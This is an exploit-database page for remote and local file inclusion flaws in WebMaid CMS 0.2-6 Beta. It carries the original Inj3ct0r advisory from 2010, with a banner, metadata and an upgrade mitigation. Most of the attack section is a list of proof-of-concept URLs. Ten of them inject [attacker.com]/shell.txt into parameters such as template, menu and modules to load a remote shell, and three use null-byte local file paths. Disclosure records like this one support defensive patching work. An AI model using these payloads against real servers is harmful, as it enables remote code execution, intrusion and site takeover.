header-logo
Suggest Exploit
vendor:
WebMaid CMS
by:
cr4wl3r
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: WebMaid CMS
Affected Version From: 0.2-6 Beta
Affected Version To: 0.2-6 Beta
Patch Exists: YES
Related CWE: N/A
CPE: a:webmaidcms:webmaid_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability

WebMaid CMS version 0.2-6 Beta is vulnerable to multiple Remote File Include vulnerabilities. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server, depending on the privileges associated with the application. The vulnerable parameters are 'template', 'menu' and 'events' which can be found in the index.php file.

Mitigation:

Upgrade to the latest version of WebMaid CMS.
Source

Exploit-DB raw data:

====================================================================
WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability
====================================================================


[+] WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11394
[+] Download: http://code.google.com/p/webmaidcms/downloads/list

[+] PoC RFI:
    [path]/template/babyweb/index.php?template=[attacker.com]/shell.txt???
    [path]/template/babyweb/index.php?menu=[attacker]/shell.txt???
    [path]/template/babyweb/index.php?events=[attacker]/shell.txt???
    [path]/template/babyweb/index.php?SITEROOT=[attacker]/shell.txt???
    [path]/template/calm/footer.php?modules=[attacker]/shell.txt???
    [path]/template/calm/footer.php?copyright=[attacker]/shell.txt???
    [path]/template/calm/top.php?menu=[attacker]/shell.txt???
    [path]/template/wm025/footer.php?modules=[attacker]/shell.txt???
    [path]/template/wm025/footer.php?copyright=[attacker]/shell.txt???
    [path]/template/wm025/footer.php?menu=[attacker]/shell.txt???

[+] PoC LFI:
    [path]/cContactus.php?com=[LFI%00]
    [path]/cGuestbook.php?com=[LFI%00]
    [path]/cArticle.php?com=[LFI%00]

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]

Navigation

Suggest Exploit

Services By CQR